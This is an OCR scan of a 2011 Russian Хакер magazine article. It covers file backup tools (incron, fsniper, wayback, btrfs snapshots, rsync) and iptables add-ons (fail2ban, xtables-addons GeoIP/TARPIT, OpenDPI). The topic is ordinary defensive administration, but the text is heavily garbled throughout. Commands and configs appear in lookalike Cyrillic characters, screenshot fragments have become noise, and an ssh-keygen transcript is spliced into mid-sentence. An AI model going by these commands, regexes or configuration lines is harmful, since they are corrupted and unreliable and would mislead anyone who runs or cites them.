ІМ_СКЕАТЕ - В наблюдаемом каталоге был создан файл 
ІМ_ОЕІЕТЕ - Файл был удален из наблюдаемого каталога 
ІМ_0ЕІЕТЕ_5ЕІР - Был удален сам наблюдаемый каталог 
ІМ_МООІРУ - Файл был изменен 

ІМ_МОѴЕ_5ЕІР - Наблюдаемый каталог/файл был перемещен 
ІН_МОѴЕО_РРЮМ - Файл был перемещен за границы наблюдаемого 
каталога 

ІН_МОѴЕО_ТО - Файл был перемещен в наблюдаемый каталог 
ІН_ОРЕМ - Файл был открыт 

Для управления тем, кто может добавлять правила, используются файлы 
/еіс/іпсгоп.аііоѵѵ и /еіс/іпсгоп.бепу, которые содержат список разре- 
шенных и заблокированных пользователей. Поумолчанию эти файлы 
н е су ще ству ют, п о это му с оз дать новоеправилоотсвоегоименим ожет 
любой пользователь. 

Демон іпсгопсі оченьудобен для решения нашейзадачи. Он стартует 
во время старта ОС и постоянно находится в фоне, а в правильных дис- 
трибутивах еще и перезапускается после падения. Проблемы скриптов, 
отваливающихся оттерминала, его не касаются. 

Вот простейший пример того, как можно использовать іпсгопсі для сле- 
жения и бэкапа файлов каталога /еіс. Запускаем редактор правил: 

$ ехрогі; ЕОІТОК=ѵіт 
$ зисіо сгопІіаЬ -е 

И пишем следующую команду: 

/е1;с ІМ_СЮ5Е_1лІКІТЕ /Ьіп/ср $@/$# $@/ .$#. Ьак-' /Ьіп/сіа1;е +'%Р’' 

Это все, теперь после каждого редактирования конфигурационного 
файла будет создаваться его скрытая и помеченная датой модификации 
копия, почти также, каки вовсехприведенныхранеепримерах. 

Каждому с(зайлу — свое место 

Существуетеще более интересная іпобі'у-утилита под названием І'зпірег 
[ іге Гі г:\_і I ! I' I' ' \іЛьпірег ]. Для решения нашей задачи она будет 
не столь полезна, ноя просто не могу обойти ее стороной. 

Программа І'зпірегбыла написана с целью упорядочить и автомати- 
зировать управление файлам и. Аналогично іпсгоп она ждет событий, 
находясь в фоне, но вместо того чтобы позволить пользователю самому 
задавать тип событий, онаумеетобрабатыватьтолько вновь созданные 



файлы и на основе маски их имени определять совершаемые над ними 
действия. 

Чтобы понять, зачем это нужно, представь, чтоутебя есть каталог, в ко- 
торый складываются все скачанные из интернета файлы (спорю, что так 
оно и есть). Время отвремени скопившуюся кучу информации приходит- 
ся разгребать, перемещая изображения в каталог ~/і та дез, видеофай- 
лы — в -/ѵісіео, музыку — в -/тизіс ит.д.Таквот, І'зпірегберетна себя всю 
эту работу, руководствуясь составленным тобой списком правил. Один 
раз написав правила, ты можешь навсегда забыть о ручном труде и на- 
слаждаться автоматической расфасовкой. 

Сами правила довольно просты в составлении и чтении, поэтому про- 
цесс написания правильного конфигурационного файла не займет 
много времени. Все, что нужно для этого сделать, это установить 
І'зпірег: 

$ зисіо ар1:-§е1; Іпз1;а11 -Рзпірег 
Создать катало г для кон фи га: 

$ шксііг ~/.соп1і§/-Рзпірег 

И поместить в него файл сопбд примерно следующего содержания: 

$ ѵі ~/.сопй§/-р5пірег/сопб§ 

ыаіісіі { 

# Наблюдаемый каталог 
~/с1оып1оас1з { 
іта§е/* { 

бапсііег = ср %% ~/іта§ез 

} 

ѵісіео/* { 

бапсііег = ср %% ~/ѵісІео 

} 

аисііо/* { 

бапсііег = ср %% ~/тизіс 

} 

} 

} 

Эти правила описываютименноту ситуацию, о которой я говорил выше, 
разныетипы данныхпомещаются в разные каталоги. Сбрати внимание, 
что в качестве метода классификации мы использовали тіте-тип, 
также допускается использование масокфайлов (например, *.аѵі) или 
регулярные выражения (.*НВРір.*). 

Теперьможнозапустить[зпірегв режимедемона и наслаждаться 
результатом: 

$ -Рзпірег --сіаетоп 

Единственное, что нужноучесть, это то, что в отличие отіпсгоп, [зпірег 
работает отобычного пользователя, а потому он должен быть запущен 
во время входа пользователя в систему или запуска графической обо- 
лочки. Пользователи Споте и КВЕ могут воспользоваться встроенными 
конфигураторами для выполнения этой операции, для всех остальных 
есть файл инициализации -/.хзеззіоп: 

$ ѵі ~/.хзеззіоп 
■Рзпірег - -сіаетоп & 

Путь назад 

Итак, мы рассмотрели несколько ЬапсІ табе-способов откатить файлы 
кпредыдущим состояниям, и теперь настало время выяснить, естьли в 
Еіпих более унифицированные и стандартизованные способы сделать 
это. Естьли здесь файловые системы, которые из коробки предоставят 
способ делать резервные копии файлов и восстанавливать их. 

Как оказалось, такие системы есть, и их не две-три, а десяток. Одна 
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[ ^1тІтуI^05І ~]$ ззЬ-кеудеп -і сіза 
бепегаііпд риЫ іс/ргіѵаі:е сІза кеу раіг. 

Епіег Тііе іп шМісЬ іо заѵе іЬе кеу (/Иоте/^1т/ ,ззМ/іс1_сІ5а) : 
/I~Iоте/^1т/ .ззЬ/ісІ_сІза аігеасіу ехізіз. 

Оѵегшгііе Су/п)? у 

Епіег раззрМгазе (етріу іог по раззрЬгазе) : 

Епіег зате раззрМгазе адаіп; 

Уоиг ісіепі ііісаііоп Маз Ьееп заѵесі іп /Ноте/ ^1т/ .ззИ/ісІ_сІза . 
Уоиг риЫіс кеу Наз Ьееп заѵесі іп /Ноте/ ^1т/ .ззИ/ісІ_сІза .риЬ . 
ТЬе кеу ііпдегргіпі із: 

Ь7:0Ь:33:Гб:ас:д5:бд:ЬГ:25:е7:дБ:12:83:21:59:Ьд ^1т@туЬозі 
ТЬе кеу'з гапсіотагі ітаде із: 

+-“[ ОБЯ 1024] + 

I о I 

I о Е I 

I о I 

I 0.1 

I 5 в о I 

I о X = I 

I . О + +1 

I + о 560І 

I . о .0 I 

+ + 

[^1т@туЬозі ~]$ | 



Генерируем новый 5514-ключ для г$упс 



из самых удобных и интересных из них носит имя ѵѵауЬаск [ ѵѵауЬаск. 
зоигсеіогде.пеі: ). Ее преимущество втом, что она работает поверх 
существующей файловой системы, а значит, натребует пересоздания 
файловой системы и каких бы то ни было манипуляций с существую- 
щими файлами. Достаточно просто установить ѵѵауЬаск, используя 
пакетный менеджер: 

$ зисіо ар1;-§е1: іп5І;а11 ыауЬаск 

И смонтировать ФС кнужному каталогу с помощью команды тоипЕ 
ѵѵауЬаск: 

$ тоигті.ыауЬаск /оригинальный/каталог /точка/монтирования 

Все, теперь любое изменение файла во втором каталоге приведет к 
прозрачному созданию его резервной копии, а следующее изменение 
— кпоявлениюещеодной копии. Для просмотра списка всехбэкапов 
выбранного файла можно использовать команду ѵзіаі;: 

$ Ѵ5і:а1: файл 

А чтобы вернуть его к одной из предыдущих версий — командуѵгеѵегі;: 

$ ѵгеѵегі; -сі 12:00:00 файл 

Такфайл снова станеттаким, каким он был в 1 2 часов. Время можно 

► 096 



указать и поточнее, например, добавить дату: 

$ ѵгеѵегі; -сІ 2011:01:01:0:00:00 файл 

Хотя, скорее всего, проще будет использовать номер сохраненной вер- 
сии, который выводитописанная ранее команда ѵзіаі;: 

$ ѵгеѵегі; -п 5 файл 

В конце концов, чтобы все эти резервные копии не захламляли жесткий 
диск, их можно потереть командой ѵгт: 

$ ѵгт файл 

И продолжать спокойно изменять файлы, в результате чего будут пло- 
диться все новые и новые версии. Просто, нетакли? 

Назая в будущее 

Все рассмотренные ранее подходы используют версионность файлов 
для обеспечения возможности ихотката кпрошлым версиям. Однако 
иногда снапшоты могут стать более действенным способом хранения 
оригиналов. 

Суть снапшотов состоит в том, чтобы дать пользователю возможность 
сделать снимоксостояния файловой системы и позволить вернуть 
ФС кэтому состоянию в любой момент времени. Сбычно механизм 
снапшотов встроен прямо в файловую систему, поэтому абсолютно 
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Производительность ФС при использовании ѵѵауЬаск 
остается на достойном уровне 

прозрачен для пользователя и удобен в использовании. Стандартные 
файловые системы ехіЗ и ех1;4 не поддерживают этот механизм (в по- 
следней он должен появиться в ближайшее время), зато его поддерж- 
ка есть в Ыгі'з, которая хоть и считается нестабильной, но включена 
в Ыпих-ядро (начиная с версии 2.6.29-гс). Поэтому если натвоей 
машине установлен достаточно свежий дистрибутив, а также имеется 
свободный раздел для экспериментов, настоятельно рекомендую вос- 
пользоваться этой возможностью. 

Для работы с Ыгі'з нужны утилиты, распространяемые в пакете Ыгі'з- 
ргодз (в некоторых дистрибутивах — ЫгІ'з-ргодз-ипзІаЫе). Их нужно 
установить в первую очередь: 

$ зисіо ар1:-§е1; іп5І:а11 Ы;г-р5-рго§5 

Далее следует выбрать подходяідий раздел, создать на нем файловую 
системуи смонтировать ее: 

$ зисіо тк-р5.Ы:г-р5 /сІеѵ/зсІХХ 
$ зисіо тоипі; /сІеѵ/зсІХХ /тп1; 

Теперь файловую систему можно наполнить данными, азатем сделать 
снапшоте помоідью следуюідей команды: 

$ зисіо Ы;г-р5с1;1 -5 1іг5І:_5пар5Ііо1; /тп1: 

Через какое-то время можно сделать следую ідий снапшот: 

$ Бисіо Ы;г-р5с1;1 -5 5есопсІ_5пар5Ііо1; /тп1; 

Количество снапшотов не ограничено, поэтому перед каждым важным 
изменением файлов можно делать все новые и новые снапшоты. Чтобы 
вернуть файловую систему ктому состоянию, в котором она находилась 
во время одного из снапшотов, необходимо просто смонтировать ее с 
опцией «5иЬѵоІ=имя_снапшота»: 

$ зисіо ишоипі; /тп1; 

$ зисіо тоипі; -о 5иЬѵо1=1іг5І;_5пар5Ііо1; /сІеѵ/бсІХХ /тп1; 

Но гораздо удобнее сразу монтировать файловую систему с опцией 
«5иЬѵоІ=.», благодаря чему все снапшоты будутвидны вточке монтиро- 
вания какпростые каталоги: 

$ зисіо итоипі; /тп1; 

$ тоипі; -о 5иЬѵо1=. /сІеѵ/бсІХХ /тпі; 

$ І5 -1 
сіе1=аи11; 



1іг5І;_5пар5Ііо1; 

5есопсІ_5пар5Ііо1; 

При работе со снапшотами Ыгі'з использует механизм сору-оп- 
ѵѵгііе (копирование при записи), так что дополнительное простран- 
ство будут занимать только те файлы, содержимое которых было 
реально изменено. Не из манившиеся файлы будут иметь только 
одну копию. 

Удаленная сторона 

Несмотря на все преимуидества описанных ранее подходов, хранение 
резервных копий нелокальной машине несамаяудачная идея. Если 
жесткий диск выйдет из строя, данные и их бережно сохраненные копии 
могутбыть безвозвратно потеряны. Мы должны позаботиться о том, 
чтобы данные сохранялись на каком-то удаленном хосте. 

Самый простой и эффективный способ сделать удаленное резервное 
копирование — это воспользоваться инструментом под названием 
гзупс. Эта система синхронизации/копирования файлов может быть 
использована как для локального бэкапа файлов, так и для их пере- 
дачи на удаленную сторону. При этом синхронизируемые файлы могут 
иметь инкрементальные бэкапы, а это значит, что при многократном 
бэкапе одних и тех же данных будут сохранены только их измененные 
части, а не весь файл целиком, как это происходит при использова- 
нии скриптов, описанных в первой части статьи. 

Инструмент гзупс можетбыть использован какдля организации об- 
ратной системы бэкапа, когда сервер собираетфайлы с нужных сетевых 
машин и сохраняет их на своем жестком диске, так и для прямого бэкапа 
на удаленную сторону. В рамках этой статьи мы рассмотрим только 
второй метод. 

Самый простой способ использовать гзупс — это доверить ему копиро- 
ваниефайлов наудаленную машину по протоколу 55Н. Устанавливаем и 
запускаем программу: 

$ Бисіо ар1;-§е1; іпБІ;а11 гБупс 
$ ГБупс -а --сІе1е1;е -е ббіі /путь/до/каталога \ 
юзер@хост : /путь/до/каталога 

Чтобы команда незапрашивала пароль, необходимо настроить аутен- 
тификацию на базе публичного ключа. Для настройки немедленного 
бэкапа наудаленную машину сделаем модифицированную версиюуже 
рассмотренного ранее скрипта: 

$ ѴІ ~/ЬІп/ІП-Г5уПС.5И 

#!/Ьіп/біі 
ОІК=' рысі' 

# Имя пользователя на удаленном хосте и каталог для бэкапа 
ІІ5ЕК="ѵаБуа" 

Н05Т="ііоб 1;. сот" 

КЕтТЕОІК="/Ьаскир" 

іпо1;і1^уыаі1; -тг --1;іте1^т1; '%сІ-%т-%у %Н-%М' \ 

--І^огтаі; '%Т %-р' -е сІ0Бе_ыгі1;е $ОІК | \ 
ыбііе геасі ОАТЕ ТШЕ РНЕ; сіо 

ГБупс -а --сІе1е1;е -е ббіі ${0ІК}/${РІІЕ} \ 

${и5ЕК}@${Н05Т} : ${КЕМОТЕОІК} 

сіопе 

Теперь после каждого изменения файлы будут бэка питься наудаленную 
машину. Было бы хорошо добавить кэтой схеме еш,е и хранение версий 
файлов, но эта задача довольно просто решается с помоидью инструмен- 
та гзпарзЬоТ обзор которого выходитза рамки данной статьи. 

Выводы 

Вернуть файлы из небытия можно множеством разных способов, 
сегодня мы рассмотрели только часть из них. Какой способ исполь- 
зовать — решатьтебе, главное помнить, что без резервных копий не 
обойтись. 



ХАКЕР 08 /1 51/ 201 1 



► 097 






иыіхою 



■ ■ Сергей «дгіпсіег» Яремчук (дгіпсІегШІих.іп.иа) 




Изучаем популярные надстройки для ірІаЫез 

@ Простая фильтрация пакетов по портам и ІР-адресам уже давно 
никому не интересна^ да и эффективной ее не назовешь. Продвину- 
тые межсетевые экраны умеют обрабатывать протоколы верхнего 
уровня, принимая решение на основе содержимого, а списки ІР ге- 
нерируются динамически. Все это умеет и ірІаЫез, нужно лишь его 
немного докрутить. 



Блокируем здрѵмышленников 
с помощью таіГ2Ьап 

Не секрет, что стоиттолько засветиться в Сети новому сервису, как сразу 
к нему потянутся нити брутфорсеров, пытающихся подобрать учетные 
данные. Остановить злоумышленников можно разными способами, один 
из них — утилита Раі12Ьап ( Іаі12Ьап.огд ). Идея проста: демон, сканируя 
логи, проверяетналичиезаписей о неудачных попытках ввода пароля 
или попытке входа в запрещенную область сети. Если таковые будут най- 
дены, то подозрительный ІР блокируется средствами ірІаЫез/ірѵѵІ'или 
ТСРѴѴгаррегі/еІс/ЬозІз.аІІоѵѵІсІепу). Со временем бан можетсниматься 
автоматически, без вмешательства юниксоида, что оченьудобно, ведь 
под раздачу может попасть и легитимный хост. О блокировке пользо- 
ватель/админ получает сообщение пое-таіі. Изначально Раі12Ьап 
разрабатывался для защиты 55Н, сегодня это уже фреймворк, который 
можно легко настроить под любые приложения и события, втом числе и 
прописать свои методы блокировки ІР. Удобно также, что один процесс 
можетзащищать сразу несколько сервисов. 

На страницезакачки Раі12Ьап предлагаются собственные сборки 
пакетовдля большинства дистрибутивов Ыпих, нодля установки лучше 
выбрать вариантиз репозитория. Мэйнтейнерыучитываютособенности 
конкретного дистра плюсдобавляютотсебя файлы запуска и правила 
блокировки. 

В ІІЬипІи/ВеЬіапустановка оченьпроста: 

$ Бисіо ар1;-§е1: іп5І:а11 -Раі12Ьап 

Демон стартует с установка ми поумолчанию,защищаятолько55Н. Все 

► 098 



настройки производятся в нескольких файлах, размещенных в каталоге 
/е1;сЛаі[2Ьап (для Вебіап/ІІбипІи). В1'аі[2Ьап.соп1'хранятся параметры 
запуска демона, внутри ничего интересного в плане настроекдля нас 
нет. Начиная с версии 0.7, фильтры и действия прописываются в разных 
файлах. Послеустановки их можно найти соответственно в подкаталогах 
бОегсІ иасІіоп.сІ.Файлы внутри этихдиректорий могутиметь расширения 
.сопі" и .Іосаі. Параметры из второго замещаютустановки из первого, то 
есть чтобы что-то переопределить, вносить изменения непосредственно 
в .сопі" не нужно. Таким образом облегчается последующее обновление 
и возврат к дефолтным настройкам. Правила поиска довольно просты. 
Предусмотрено использование переменных, причем имеются уже встро- 
енные. Так, Н05Т соответствует регулярному выражению, используемому 
для поиска ІРили имени узла: 

( ? : : : Т{4, 6} : ) ? ( ?Р<бо5І;> [\ы\- . ^_]+) 

Вот, например, правило для поиска попыток ВВОЗ-атаки на 55Н: 

$ §гер -V /е1:с/-Раі12Ьап/1і11;ег.сІ/55ІісІ-сІсІо5.соп-Р 
[Ое1іпі1;іоп] 

Таі1ге§ех = б5іісі(?:\[\сі+\])?: Оісі по 1; гесеіѵе ісІеп1;і1іса1:іоп 
5І;гіп§ Тгот <Н05Т>$ 
і§погеге§ех = 

Строка І^аіігедех описывает, что искать. В ідпогегедех — значения, кото- 
рые должны игнорироваться. В одном файле можетбыть несколько таких 
строк. Кто хоть немного разбирается в регулярных выражениях, легко 
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I 1«11Я«П-ГЧ*>: МІИѵИІСЛІІѴІ Г«11 кг*і і«вмі«-Ч^- 

! Ііу-^Ч^1ІѴі,ГіИ Г1И«|Г-Ч«* Г)і»|к)«ЕТі'ІТгЧі*«Н4С-.'‘^Пі''І' 

;/і»Г/іІМГІ/Г4і121МА/»П*Г/Пи«С.^^г4і2г Бл^ГЛСвІІлМІІГйІП}: іП* «Л •в^Ш* І1 4й(1Г«е*Ш; 111* Ии 
іфіііь ІМкІіИ 




1 ГІИЛГ^г^* ГЧН№І»^ІТ> 



Тестируем правило для !аіІ2Ьап 



создастсвое правило, используя имеющиеся примеры. Для 
разбора лог-файла демон вызываетутилиту[аі[2Ьап-гедех, 
которую обычно применяюти для проверки нового фильтра. 
Например, в поставке нет правила для Азіегізк или другого 
подобного сервера, но сегодня атаки наѴоІРнередки, и в 
логах можноувидеть записи вроде: 



8аАя Ормка Вид П|дися Ідрмимал С^^р^тя 



ш Оргіоп: 
« Но(е$.: 
й 

ш 

і 

» 



Іодіеѵеі 

$е( (Ье Іод Іеѵеі оиІри(. 

1 - ЕППОП 

2 > МАЯМ 

3 - ІМРО 

4 - ОЕВиС 



« Ѵа 1 ие$: мин ОеГаиИ: 3 



« 

Іодіеѵеі > 3 



# Орііоп: Іодіагдеі 

# Мо(е&.: Ве( (Ме Іод Іагдеі. ТМІ 5 сои 1<1 Ье а Піе, 5 Ѵ$ЮС. 5 Т 0 ЕЯК ог ЗТООиТ. 

і Опіу опе Іод (агдеі сап Ье $ресіТіеі 1 . 

« Ѵаіие»: ВТООиТ ВТВЕЯЯ ЗѴВЕОС Ше ОеТаии: /ѵвг/Іод/Га 112 Ьап.Іод 

ё 

Іодіагдеі - /ѵаг/Іод/Раі 12 Ьап.Іод 



Ш ОрПоп: $оске( 

і Моіез.: &е( іЬе $оскеІ Еііе. ТЫ$ 1 $ и$е <1 (о сомаипісаіе міІЬ ІНе даепоп, Оо 
і поі гепоѵе ІЫ$ Рііе мЬеп Раі 12 Ьап тп$. И ѵШ лоі Ье ро 5 & 1 Ые іо 

# соішвипісаіе мИЬ ІЬе $егѵег аТіепмгОк. 

ё Ѵа 1 ие$: РНЕ ОеТаиИ: /ѵаг/гип/Гаі 12 Ьап/Ра 112 Ьал.$оск 

ё 

&оскеі ■ /ѵаг/гип/Іаі 12 Ьап/Таі 12 Ьап.$оск 



- % саі /еІс/Раі 12 Ьал/ 
асііоп.О/ Гаі 12 Ьап.сопГ . Ш 1 ег.< 1 / 

- $ саі /еіс/Ра 112 Ьал/Т 1 Иег.(І/ 

арасЬе-аиІЬ . сопТ соиг 1 ег$аІр. сопТ 

арасЬе-ЬаОЬоі$ . сопР суги$- 1 «ар. сопТ 

арасИе-поЬопе.сопР ехІа.сопР 

арасЬе-по&сгІрІ .сопР д^аРРрЬ.сопР 

арасЬе-оѵегРІоы$ . сопР 11 дЬИр< 1 - Ра$ 1 сді . сопР 
сопнлоп.сопР па»еЬ-геРи$е< 1 .сопР 

соигІегІодІп.сопР рал-депегІс.сопР 

- $ саі /еІс/Раі 12 Ьап/Ріиег.()/|. 



ІаіІ.солР 

рЬр-игІ-Рореп.сопР 

роаіРіх.сопР 

ргоРІр< 1 .сопР 

риге- РірО. сопР 

ОМІІ.сопР 

$а$ 1 .сопР 

кіеѵе.сопР 



аіМ.сопР 

$&Ьб-(1(ІО&.СОПР 

ѵ&Рір().сопР 

меЬікІп-аиРЬ.сопР 

ыиРірО.сопР 

хіпеКІ-РаіІ.сопР 



О ШИЦ И Тармічаіі | ^ шх США дф Вто 24.0$. 12:51 

В поставке !аіІ2Ьап уже имеются с|эильтры для защиты 
некоторых приложений 



♦ 



МОТІСЕ[3309] сбап_5Ір.с: Ке§І5І:га1:іоп Тгот 
'5Ір:ХХХ@1.2.3.4' -Раііесі Тог '9. 8. 7. 6' - N 0 та1:сбіп§ 
реег ТоипсІ 

Правило будет следующее: 

Таі1ге§ех = МОТІСЕ.* Ке§І5І:га1:іоп Тгот ' 

Таііесі Тог ' ' - Мо та1:сіііп§ реег ТоипсІ 

Итакдля каждого случая. Проверяем: 

$ Таі12Ьап-ге§ех /ѵаг/1о§/а5І;егІ5к. 1о§ 'МОТІСЕ.* .*: 
Ке§І5І;га1:іоп Тгот ' .*' Таііесі Тог ' ' - Мо таТсІііп^ 
реег ТоипсІ' 

Если все нормально, записываем фильтры в новый файл 
азіегізк.сопб взяв за пример любой из каталога ЯНегб. 

Стем, что искать, разобрались. Осталось указать, где искать, 
и что делать с находкой. Описания всехдействий собраны 
в подкаталоге асбоп.б. Здесь несколько файлов под каждое 



Технология ОРІ 



Оеер Раскеі: Іпзресбоп (глубокое инспектирование 
пакета) — технология, позволяющая 
проверять пересылаемые данные, а не только 
протоколосодержащую информацию. О РІ -устройства 
способны работать со второго по седьмой уровни 051 и 

ВЫЯВЛЯЮТ: 

• типы передаваемых данных (Р2Р, ѴоІР, опііпе-игры, 
почта, видео), позволяя контролировать и блокировать 
трафик согласно установленной политике; 

• использование в сети наиболее распространенных 
приложений (например, для Р2Р: ВкТоггепк Ка2аа, 
еОопкеу ОпиЩНа, МР2Р, РазіТгаск); 

• загрузку сети тем или иным сервисом, формируя 
на основе анализа механизмы, гарантирующие 
определенную производительность сети (0о5); 

• злонамеренный трафик в сети (эксплоиты, черви, 
трояны и прочие зловреды). 



приложение/задачу, как правило, там уже все настроено, 
и менять ничего нетребуется. Но чтобы новые фильтры 
увидел Раі12Ьап, необходимо объявить их в/е1;с/Ьаі12Ьап/ 
)аі1.сопб Внутри этого конфига находим несколько секций с 
описанием разных сервисов. 

$ 5ис1о папо /еі:с/Ьаі12Ьап/]аі1.согтР 
[ОЕРАУЕТ] 

// ІР-адреса^ которые не будут блокироваться^ здесь 
можно указать подсеть или 0М5-имя 
і§погеір = 127.0.0.1 

// Время блокировки узла^ при отрицательном значении 
блокировка постоянная 
Ьапііте = 600 

// Промежуток времени и количество неудачных 
попыток^ необходимых для блокировки 
тахгеігу = 3 
бпсПііте = 600 

[а5І;егІ5к-ір1;аЫе5] 
епаЫесІ = ігие 

# В б11:ег и асііоп прописываем имя файла без 
расширения из соответствующих подкаталогов плюс 
дополнительные параметры 

бНіег = азіегІБк 

асііоп = ір1;аЫе5-а11рог1;5[пате=А5ТЕКІ5К^ 
рго1;осо1=а11] 

5епсІтаі1-ыІіоІ5[пате=А5ТЕКІ5К^ сІе5І;=гоо1;^ 
5епсІег=-Раі12Ьап@ехатр1е . ог§] 

# Логи АзіегІБк 

1о§ра1;Іі = /ѵаг/1о§/а5І;егІ5к/те55а§е5 

# Переопределяем дефолтные значения 
тахгеігу = 5 

Ьапііте = 6000 

Проверяем, запущеныли сервисы: 

$ Бисіо Бегѵісе іріаЫеБ Біагі 
$ Бисіо Бегѵісе -Раі12Ьап Біагі 

Работу РаіІ2Ьап можно отследить, просмотрев журнал /ѵаг/ 
[одЛаіІ2Ьап.[од или правила ірІаЫез. 




НТТР://ѴѴѴѴѴѴ 



■ ■ 

> Ііпкз 

• Сайт РаіІ2Ьап — 
ІаіІ2Ьап.огд . 

• Ресурсы ОрепВРІ 

— орепбрі.огд, собе. 
доодіе.сот/р/орепбрі . 

• Сайт ХЩЫез-аббопз 

— хІаЫез-аббопз. 
зРпеС 
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После активации !аіІ2Ьап в цепочках ірІаЫез появляются ОрепОРІ поддерживает большое количество протоколов 
новые правила 



$ зисіо ірІіаЫез -I -ѵ | §гер -Раі12Ьап 

Коллекция аддонов ХІаЫе$-асІсІоп$ 

Проект раІсЬ-о-ппаІісі-пд), предлагавший различные расширения 
для ірІаЫез.уже некоторое время не развивается, его место занял 
ХіаЫез-асІсІопз (хІаЫез-асІсІопз.зІ'.пеІ;). Главная его особенность — для 
установки модулей не требуется пересборка ядра и/или ірІаЫез. В итоге 
добавление новыхфункций происходиточень просто, нетпроблем и 
при обновлении ядра. Если ядро собиралось вручную, проверь наличие 
С0МР10_МЕТР1ЕТЕР_ХТАВЕЕ5 в параметрах: 

$ §гер -і х1:аЫе5 /Ьоо1;/соп1і§-' ипате -г' 
СОМРІС_МЕТРІІТЕК_ХТАВІЕ5=т 

В одних дистрибутивах основные модули уже включены в базовый со- 
став, в других — размеідены в репозиториях пакетов. В ПЬипІи команда: 

$ Бисіо ар1:-сасііе зеагсіі хІіаЫѳБ-асІсІопБ 

...выдаст два пакета: один с инструментами и библиотеками, другой — с 
исходниками. 

$ Бисіо ар1;-§е1; Ьиіісі-сіер х1;аЫеБ-асІсІопБ-соттоп 

Какправило, в репе находится не самая актуальная версия, поэтому 
качаем с сайта архив с исходными текстами, распаковываем и даем стан- 
дартную последовательность команд: «./сопГдиге; таке; таке іпзіаіі». 
Проверяем загрузку модуля: 

$ ІБГПОСІ х_1;аЫеБ 

Теперь можно создавать правила. 

В состав пакета входитболее 20 модулей иутилит различного назна- 
чения. Документации на сайте кактаковой нет, но практически все, что 
нужно для старта, описано в «тапхІаЫез-аббопз». Разберем самые по- 
пулярные из них. Отфильтровать шныряюидих сканеров и ботов вручную 
по ІР-адресам невозможно, но можно суидественно уменьшить поток, 
отрезав страны, имеюидие «скверную репутацию». Модуль ОеоІР по- 
зволяетприменятьправила кпакетам на основании страны источника/ 
назначения. Но чтобы фильтр работал, необходимо скачать и установить 
базы. Для этой цели используются два скрипта, лежа ш,ие в каталоге/изг/ 
ІіЬехес/хІаЫез-асІбопз (или /изг/ІіЬ/хІаЫез-аббопз). Для обработки С5Ѵ 
потребуется соответствуюидий модуль Регі: 

$ ссі /иБг/1іЬехес/х1;аЫеБ-асІсІопБ/ 

$ Бисіо ./х1;_§еоір_сІ1 



$ Бисіо шксііг /иБг/БІіаге/х1:_§еоір 

$ Бисіо ар1;-§е1: іпБІіаІІ 1іЫ;ех1:-сБѵ-хБ-рег1 

$ Бисіо ./х1;_§еоір_Ьиі1сІ -О /иБг/БІіаге/х1:_§еоір *.сбѵ 

После выполнения последней команды будет выведена таблица стран, 
которые затем указываются через запятую в параметрах '--згс-сс' (страна 
источник), '--бзі-сс' (назначение). Все параметры можноузнать, выпол- 
нив «ірІаЫез-т деоір-беір». 

// Блокируем азиатских друзей 
$ Бисіо ірІіаЫеБ -А ІМРІЯ -т §еоір \ 

--БГС-СС СМ, ТІЛІ, КК -д КЕЗЕСТ 
// Блокируем анонимные прокси 
$ Бисіо ірІіаЫеБ -А ІМРІЯ -т §еоір \ 

--БГС-СС А1 -д КЕЗЕСТ 

// Подключаться к 55Н можно только из России 
$ Бисіо ІрІіаЫеБ -А ІМРІЯ -р іср -сірогі: 22 \ 

-т §еоір ! -Бгс-сс РШ -д КЕІЕСТ 
// Запрет исходящих ІСМР в некоторые страны 
$ Бисіо ІрІіаЫеБ -А ОІЯРІЯ -р істр -т §еоір \ 

-сІБі-сс Е5 -д КЕІЕСТ 

Используя ОеоІР, можно маркировать трафик, чтобы его обрабатывать 
по-другому или считать отдельно: 

іріаЫеБ -А ІМРІЯ -р іср --сірогі 80 -ш §еоір \ 

--БГС-СС РШ -д МАРІК --Беі-тагк 1 

Все привыкли, что атакуемый хост отражает нападение, просто блокируя 
ІР-адрес, и никакактивно не противодействует злоумышлен нику. В 
комплекте аддонов доступно несколько модулей, позволяюидих ответить 
или ввести в заблуждение. Самый известный изнихноситназвание 
ТАРРІТ. Работаетон просто: при подключении соединение открывает, 
но вотзакрыть«забывает» (посылаете ответпакетс размером ТСРокна 
равным нулю). Удаленная система правильно обработать такой посыл не 
может и отправляет в ответ сообидение о закрытии соединения, которое 
игнорируется. В итоге соединение «висит» около двадцати минут, по- 
требляя ресурсы удаленной системы. Например, 55Н-сервер часто под- 
вешиваютна порт, отличный от22. Это спасает отнекоторых сканеров, 
для остальных ставим ловушку: 

$ Бисіо іріаЫѳБ -А ІМРІЯ -р іср -т іср \ 

-сірогі 22 -д ТАКРІТ 

Теперь все, кто попробует подключиться к 22 порту, попадут в расставлен- 
ные сети. 
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После установки хІаЫез-асІсіопз будет загружен соответ- 
ствующий модуль ядра 



Модуль ОЕШОЕ позволяет ввести В заблуждение сканер, показывая, что 
запрашиваемый портоткрыти принимаетподключения. Еслитыеідене 
решил, какой лучше, ТАРРІТ или ОЕШОЕ, используй СНА05, который в 
ответ на запрос применяет в основном ОРОР (по умолчанию к большин- 
ству пакетов), но иногда — ТАРРІТ, ОЕШОЕ или РЕ^ЕСТ. Поведение 
модуля можно изменить, установив параметры при загрузке при помоіди 
'--беІибе7'--1;агріІ' или в процессе выполнения в файле/зуз/тобиіез/ 
хІ_СНА05/рагатеІег5. 

Проект ІРР2Р прекратил свое суідествование, но в аддонах доступен 
соответствуюідий модуль, позволяюідий распознавать Р2Р-трафик, 
который затем можно блокировать или ограничить. В качестве доппара- 
метров можноуказать один из Р2Р-протоколов, либо все сразу: 



$ зисіо ір1;аЫе5 -А РОКІлІАКО -т Ірр2р --ірр2р -] ОКОР 

Анализируем трафик с ОрепОРІ 

Межсетевые экраны, работаюідиена втором и третьем уровнях, давно уже 
перестали удовлетворять современным требованиям обеспечения без- 
опасности. Например, блокировка портов, используемых ІСО, ничего не 
даст. Пользователь можетобойти запрет, подключившись через прокси, 
работаюідий на разрешенных портах вроде 80. Только поднявшись выше, 
проанализировав данные прикладного уровня, можно действительно 
ограничить нежелательный трафик. Стандартными средствами ірІаЫез 
этого добиться нельзя, поэтому юниксоиды взяли на вооружение ЕУ-ЯНег 
и ІРР2Р. Но говорить о них не будем, так как им на сменупришло более ин- 
тересное решение — ОрепПРІ [орепбрі.огд. собе.доодіе.сот/р/орепбрі ]. 
Распространяемый подлицензией ЕОРЕѵЗ, ОрепПРІ построен на коде 
коммерческого продукта РАСЕ, который разрабатывается компанией 
Іродие. То есть основа солидная, так как РАСЕ позиционируется каксред- 
ство классификации трафика и управления пропускной способностью 
сетей уровня интернет-провайдера. Все возможности по определению 
